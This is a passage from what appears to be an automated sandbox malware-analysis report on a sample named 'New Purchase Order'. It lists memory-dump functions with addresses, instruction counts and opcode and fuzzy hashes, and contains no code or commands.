                          • Instruction ID: 981074719c41b36e14ab71ac3799285133faf93b175cdda72a5db0722e8f842a
                          • Opcode Fuzzy Hash: 8bd4a29cdedea4234fa111c5b066252fad5da756755b82d52e511b0e1d54d83c
                          • Instruction Fuzzy Hash: BF014732210226ABEF3C6E1598C8BEABB69EFC2E58B04012CF64106055DB20AC81C792
                          Function 011D2000 Relevance: .8, Instructions: 757COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ede6441f5c8fdb065c82d21f8e58380edb78ff6a73b1cf15b3114b4ed12432ac
                          • Instruction ID: fe63354deeb141e93ec25a6f51339615a6c3f1ac5bb7d0159d47e6d906d9105b
                          • Opcode Fuzzy Hash: ede6441f5c8fdb065c82d21f8e58380edb78ff6a73b1cf15b3114b4ed12432ac
                          • Instruction Fuzzy Hash: 0A42E1326083419FE72DCF68C891B6BBBE5BF88304F49492DFAA297250D771D845CB52
                          Function 011C8158 Relevance: .6, Instructions: 617COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 798dc8d625026b22625af69c68101787d151cd1727f77f23b4e330992ef25bd9
                          • Instruction ID: 590d9c11220e833e1cb049e090188632ba8d680237654d31b8aefcfc6572ea71
                          • Opcode Fuzzy Hash: 798dc8d625026b22625af69c68101787d151cd1727f77f23b4e330992ef25bd9
                          • Instruction Fuzzy Hash: F1426C71A002299FEB28CF69C881BADFBF5BF98704F15809DE949EB241D7349981CF50
                          Function 01142840 Relevance: .6, Instructions: 605COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 99450e9ee3b1251442dbaeda69dffdb81efefab6686bb78f4b7f58243794a3c5
                          • Instruction ID: 26882aa2c855bf91425e2b861e098c36348be0a610056cfd211d930142261343
                          • Opcode Fuzzy Hash: 99450e9ee3b1251442dbaeda69dffdb81efefab6686bb78f4b7f58243794a3c5
                          • Instruction Fuzzy Hash: CA32AD70A007568BEF2DCF69C8447BEBBF2BF84704F14411DE5A69B285E735A841CBA1
                          Function 011DA118 Relevance: .6, Instructions: 591COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3161b6926664ae4cccb7ce0d4d3eb03d6f332c604d00801bba7a75e17dd45a01
                          • Instruction ID: e23a6bdb7efda79371bad65adc3b0538340b085e1630d75434c41daf4d4142a5
                          • Opcode Fuzzy Hash: 3161b6926664ae4cccb7ce0d4d3eb03d6f332c604d00801bba7a75e17dd45a01
                          • Instruction Fuzzy Hash: E122E170204661CFEB2DCF2DE094372BBF1AF45300F09855AEA968F286E775E452CB61
                          Function 01136A50 Relevance: .5, Instructions: 548COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5bf156713a5c28c135b2f9f86f41a6e5266114b24443ae4f8d1157878a64027f
                          • Instruction ID: bc26ffa157de29e9d0751ebdc1bc286011f8ae9a6a18b130cb6202fbd9469b80
                          • Opcode Fuzzy Hash: 5bf156713a5c28c135b2f9f86f41a6e5266114b24443ae4f8d1157878a64027f
                          • Instruction Fuzzy Hash: 5732CD71A04205EFDB29CF68C480BAEBBF1FF88310F248569E956AB395D734E941CB51
                          Function 01154A35 Relevance: .4, Instructions: 423COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                          • Instruction ID: 28693fc995b4bcc797c20a5a27ae8efdf707e60b9156f86fef58794dff985d2b
                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                          • Instruction Fuzzy Hash: ACF18D70E0021ADBDF5DCFA9D480BAEBBF5AF48714F048129ED25AB640E734D881CB60
                          Function 011C892B Relevance: .4, Instructions: 386COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28123d10360a0e3b7a260fe46b742e948851f3724d693c0fb2bbcd36500cc3b0
                          • Instruction ID: ed3257fc4808183cc0b90e5d4aa9b86b440eebe0977117acafdeecfd2b251aa3
                          • Opcode Fuzzy Hash: 28123d10360a0e3b7a260fe46b742e948851f3724d693c0fb2bbcd36500cc3b0
                          • Instruction Fuzzy Hash: D8D10F71A0061A9BDF0DCF68C881BFEB7F1AF98B04F19816DD855A7241E735E902CB60
                          Function 011365D0 Relevance: .4, Instructions: 383COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 563ac1046d8730cf5c542b519a7ae89d1f757610836af79d82e4ab08fe28e074
                          • Instruction ID: 16d33c5d6934a0c46521b3b444b3ab7f0725166376db4d7806ae0cf7b6332bcb
                          • Opcode Fuzzy Hash: 563ac1046d8730cf5c542b519a7ae89d1f757610836af79d82e4ab08fe28e074
                          • Instruction Fuzzy Hash: D4E1AF71608342EFC719CF28C480A6ABBE0FFC9314F05896DE99987355E731EA45CB92
                          Function 01128397 Relevance: .4, Instructions: 380COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d750df395bcd44e5a31b5de39f898c3ed6c0e1c8fe1103c5b9e5321619db1532
                          • Instruction ID: dbd3721bd50455911c24647dd2c498ca11f3c21d7f75a9a355a593f6fc4f320c
                          • Opcode Fuzzy Hash: d750df395bcd44e5a31b5de39f898c3ed6c0e1c8fe1103c5b9e5321619db1532
                          • Instruction Fuzzy Hash: CDD1F471A006269BDB1CDF69C890BBA77F5FF54308F15822DE912DB280E734E961CB61
                          Function 011B8243 Relevance: .3, Instructions: 322COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                          • Instruction ID: 947a9bdf657a187e1d8aa9c805e990e8cdf230e75d53eaaa35f16ca8f9794fab
                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                          • Instruction Fuzzy Hash: EDB14F75A00605AFDB28DF99C980AEBBBBDFF84704F14446DEA4297790DB34E905CB10
                          Function 01140535 Relevance: .3, Instructions: 300COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                          • Instruction ID: 192e9c881e885f9782851e0a75263cb82085f15f8dc5dacf391148cc6e53deb1
                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                          • Instruction Fuzzy Hash: E9B12731600646AFDF2DDBA9C850BBEBBF6EF48604F190159E6529B381D730ED42CB91
                          Function 011383C0 Relevance: .3, Instructions: 281COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03bdec553cbfbce8b3966feb8f8b56ff95e97ab33e0b54a77ec06208a6655ac6
                          • Instruction ID: 9df9060cfdd2aa749ffc8390552d250640b490d916bfaa5533caf95ab08ac616
                          • Opcode Fuzzy Hash: 03bdec553cbfbce8b3966feb8f8b56ff95e97ab33e0b54a77ec06208a6655ac6
                          • Instruction Fuzzy Hash: 30C15870108381DFEB68CF19C484BAAB7E5BF88304F44496DE99987391D774EA48CF92
                          Function 0112C427 Relevance: .3, Instructions: 280COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96a17e04f66587646ee08c76edf54f8ed6a0af3895874b791e650086571e444b
                          • Instruction ID: 2c707d1bc15f9871a0f28d7d05ad5341d135dc27be4f7568d9ecf7cb575f9f31
                          • Opcode Fuzzy Hash: 96a17e04f66587646ee08c76edf54f8ed6a0af3895874b791e650086571e444b
                          • Instruction Fuzzy Hash: 71B15F70B002668BDB78DF58C890BADB7B5AF44704F0485EAD64AE7241EB70DD86CF61
                          Function 0115E5E7 Relevance: .3, Instructions: 278COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2260f6573310928f06fa61912552b020494682aaf0168c129e9ed4b4da2d129d
                          • Instruction ID: fef7b9354b996cd8741fb802eb744850d706892d90282f7284800f6c9c500688
                          • Opcode Fuzzy Hash: 2260f6573310928f06fa61912552b020494682aaf0168c129e9ed4b4da2d129d
                          • Instruction Fuzzy Hash: 7EA12231E01656EFEF298F98C848FAEBFA4BB04754F054121EE21AB281D7749E41CBD1
                          Function 01170185 Relevance: .3, Instructions: 276COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b53a98139f04d39f5993584ce324ff6e35f2c5cfbda9dd9acb0cf95f7e27a725
                          • Instruction ID: e93e26f5dd53c5c31b7b56637747dd4aa84940d38fce6ecaf7667a94348c7b10
                          • Opcode Fuzzy Hash: b53a98139f04d39f5993584ce324ff6e35f2c5cfbda9dd9acb0cf95f7e27a725
                          • Instruction Fuzzy Hash: 7BA1B075B0071A9FDB2DDF69C890BAABBB1FF49318F104129EA0697381DB34A851CB50
                          Function 01204500 Relevance: .3, Instructions: 275COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ef1c169f54f6234377b8bbb45e50d7fc5e2a211da18356de25fc10656552971
                          • Instruction ID: f3fec1641f21d65434f4e1cf12e00fedfc68b46c01f36be48259b6ab9ac5408c
                          • Opcode Fuzzy Hash: 2ef1c169f54f6234377b8bbb45e50d7fc5e2a211da18356de25fc10656552971
                          • Instruction Fuzzy Hash: AEA1C172624252EFC726EF18CD40B6ABBE9FF58704F044A28E6459B692D334ED01CB91
                          Function 01202B57 Relevance: .3, Instructions: 266COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                          • Instruction ID: e7bce752c71038997d5846227fa97d5c4a31ef5bed114b5cec08f3a3ad560b53
                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                          • Instruction Fuzzy Hash: AAB13C71E1061ADFDF1ACFA9C884AADB7B5FF48310F14826AE914A7395D730AD41CB90
                          Function 011B60E0 Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca316d37a94a5f99860abe03c10cc705882fee474b2294c6c7c8a49e933cc295
                          • Instruction ID: b6009bee40bad42d514a54e67d325ffaa0e5df3c5586b836fd66ae6678950ff4
                          • Opcode Fuzzy Hash: ca316d37a94a5f99860abe03c10cc705882fee474b2294c6c7c8a49e933cc295
                          • Instruction Fuzzy Hash: E491CF71E04216AFDB19CFA8D8D4BEEBFB5AF58710F154169EA14AB350D734E900CBA0
                          Function 0114E3F0 Relevance: .3, Instructions: 261COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66a0bcc08e1cf6b2f974e33db565efb240fd91694f7500ffea80612b39dfb4c5
                          • Instruction ID: c15ff707629188ba2370b3ae9545ab31f9de28854754c2b97ebdd5ca1a50d727
                          • Opcode Fuzzy Hash: 66a0bcc08e1cf6b2f974e33db565efb240fd91694f7500ffea80612b39dfb4c5
                          • Instruction Fuzzy Hash: 36910336A0161ADBEB2CDB68C444BBD7BA1FF94B18F094069ED15DF240E738D941CB91
                          Function 011FAB40 Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                          • Instruction ID: 644d2f317cf8732ac53c67b1b58928882c4ec25c734f3a7d200db8899b623bb3
                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                          • Instruction Fuzzy Hash: E5817231A002099FDF1DDF98D490AAEBBB6FF84314F19856DDA1A9B385D738E901CB50
                          Function 0116E284 Relevance: .2, Instructions: 212COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c4a1a6df770ff467bea37cf42cd67f536411d8484b3d2b8e9bb5c1ff021f4d1
                          • Instruction ID: d317ccb85cbd077f6866f9142f6ce9f9f3f60e77e80adcddce157099080a1d0f
                          • Opcode Fuzzy Hash: 7c4a1a6df770ff467bea37cf42cd67f536411d8484b3d2b8e9bb5c1ff021f4d1
                          • Instruction Fuzzy Hash: 7E81AD75A01609EFDB29CFA8C880BEEBBFAFF88344F104529E555A7250D731AC55CB60
                          Function 0114C640 Relevance: .2, Instructions: 206COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a58db77d036177f5a60ae05e618fa6ef0ddff3447f325e8e9167956eda91958
                          • Instruction ID: 1a3d15b3ce24fd6ee6c536af8de2776ab9209a1bb5bda0da00e77a8001b54373
                          • Opcode Fuzzy Hash: 6a58db77d036177f5a60ae05e618fa6ef0ddff3447f325e8e9167956eda91958
                          • Instruction Fuzzy Hash: F971AB75D05669ABCB29CF58D8907FEBBB1FF59B10F15411AE952AB350E730A800CBA0
                          Function 011E47A0 Relevance: .2, Instructions: 202COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 426f83564dd8f2fada7cb7c0059cd7a9f18c5843b21a74cd360a38437641ef76
                          • Instruction ID: 44b4a2597e1591b27487c70c8046c34c87d8a3784bb5bf422acefebd98c5bc15
                          • Opcode Fuzzy Hash: 426f83564dd8f2fada7cb7c0059cd7a9f18c5843b21a74cd360a38437641ef76
                          • Instruction Fuzzy Hash: 5C71C071A00609EFDB38DFD8D948A9EBBF9FF84310F00915AEA11E7298D7358940CB54
                          Function 0114260B Relevance: .2, Instructions: 201COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c4a8891129c70a07678a955dc1216d76102bcd38ca96dfc65d7da6dc4a227c3
                          • Instruction ID: dd6acfcd0e379a5ba6d10c091e01278ba5ddd683029e510f7d9b5833859e9941
                          • Opcode Fuzzy Hash: 3c4a8891129c70a07678a955dc1216d76102bcd38ca96dfc65d7da6dc4a227c3
                          • Instruction Fuzzy Hash: 0C71E1316046428FD719DF68D484B2AB7E5FF84714F0585AAF898CB352DB34DC86CBA2
                          Function 011B035C Relevance: .2, Instructions: 198COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                          • Instruction ID: f772f09861cb8dd5f88f095078774b2c9333463e716109ab0e2475c3b2c0a069
                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                          • Instruction Fuzzy Hash: C6718B71E0061AAFCB19DFA9C984EEEBBB8FF48704F104569E505A7250DB34EA41CB90
                          Function 011C62A0 Relevance: .2, Instructions: 198COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61d1153496cbedd3e3174182c9acfaa4cb47742bffa418bc2a4ebe3539a59afe
                          • Instruction ID: f8afc9a2bb4b5d40208775f3b63a0f8e9e69843fbccdf89927440e4945f195cf
                          • Opcode Fuzzy Hash: 61d1153496cbedd3e3174182c9acfaa4cb47742bffa418bc2a4ebe3539a59afe
                          • Instruction Fuzzy Hash: 0E71E132200B01AFE73A9F18C844F6ABBB6EF60B24F15442CE255873A1D775E945CB50
                          Function 01138AA0 Relevance: .2, Instructions: 197COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ea65e5939911a7dfd172f6b4ef1e8bdcaf1735190c1858d5ebed2705cf054c3
                          • Instruction ID: 8ee64b4c48805b90ba539587c0a5820837fcd5a1430a2900773af9bfd9212d5d
                          • Opcode Fuzzy Hash: 5ea65e5939911a7dfd172f6b4ef1e8bdcaf1735190c1858d5ebed2705cf054c3
                          • Instruction Fuzzy Hash: 9C81D372A08346DFDF2CDF98D488B6DBBB1BF88314F164269E9106B289C7749D41CB90
                          Function 01208324 Relevance: .2, Instructions: 192COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae0257738bf05caca712cd855ff0c610f112addecd66b201881a235028eef4dc
                          • Instruction ID: 201d5b4d1a88249bf63e513bcf828b739ce5264f3c7608f1d0be2c16913f45c2
                          • Opcode Fuzzy Hash: ae0257738bf05caca712cd855ff0c610f112addecd66b201881a235028eef4dc
                          • Instruction Fuzzy Hash: 7D711B71E1021AAFDB16DF94CC81FEFBBB9FB04754F104219E610A7291E774AA05CB90
                          Function 011EA250 Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60357626144035eabbd0e415f251611330170036107488e8c2a534be27d27fdb
                          • Instruction ID: 74f0fc1b4ec9153979a7822f3fc42f183c282e14430958b05e0e366de376198d
                          • Opcode Fuzzy Hash: 60357626144035eabbd0e415f251611330170036107488e8c2a534be27d27fdb
                          • Instruction Fuzzy Hash: F751D272504B12AFD72ADEA8D848E5BB7E8EFC4B54F050929FA40DB250D770ED04C7A2
                          Function 011D8350 Relevance: .2, Instructions: 161COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80c5a42250c6ebb6815c74a176c3535bf45289dc08e2cf5eae2b66269fc80eea
                          • Instruction ID: c769acead761f1846ec6f76a80215f241b2ee43df2d5412fe4192694219abf15
                          • Opcode Fuzzy Hash: 80c5a42250c6ebb6815c74a176c3535bf45289dc08e2cf5eae2b66269fc80eea
                          • Instruction Fuzzy Hash: 8551D070900705EFD729DF5AC880BABFBF8BF54714F10461ED296976A0C7B0A541CB90
                          Function 0116E443 Relevance: .2, Instructions: 158COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50b07158df69bcf2545053ce502ff770b32d5c96d2cbcff9f997f0216ca58aad
                          • Instruction ID: a85190c0062f048522c10ac150d39347635a137fb92e9c63eb68f1cd76007635
                          • Opcode Fuzzy Hash: 50b07158df69bcf2545053ce502ff770b32d5c96d2cbcff9f997f0216ca58aad
                          • Instruction Fuzzy Hash: 2151BB35201A15DFCB2AEFA9C980FAAB7FDFF14748F41052AE51187260E731E951CB50
                          Function 011D4180 Relevance: .2, Instructions: 156COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3210692627bdea7399c2378c4cff5866ab29d92d017e7c8cfb668f48a6a7189a
                          • Instruction ID: 2ff111352ad12f1eef386e749eb566824b0b10899df5ad722d89afb265d7afa5
                          • Opcode Fuzzy Hash: 3210692627bdea7399c2378c4cff5866ab29d92d017e7c8cfb668f48a6a7189a
                          • Instruction Fuzzy Hash: 5E516771608352AFD758DF2DD880A6BBBE5BFC8208F44492DF599C7A50EB30D905CB52
                          Function 011545B1 Relevance: .2, Instructions: 156COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                          • Instruction ID: 381823090e5c736072c04f9fb9c155b277ff9677ccea27ae9a075dff9f862263
                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                          • Instruction Fuzzy Hash: FD51C171E0461AEBDF5DDF94C840BEEBBB5AF45354F044069EA21AB240E734ED84CBA4
                          Function 011BE9E0 Relevance: .2, Instructions: 154COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                          • Instruction ID: b830e2cbd68380fa4122a9d866231251c29f58b40f5ef4f439c67a765877481e
                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                          • Instruction Fuzzy Hash: 8651BA71D0121AEFDF299F94C9D4BEEBB79AF00318F154655D91267290D7309D40C7A1
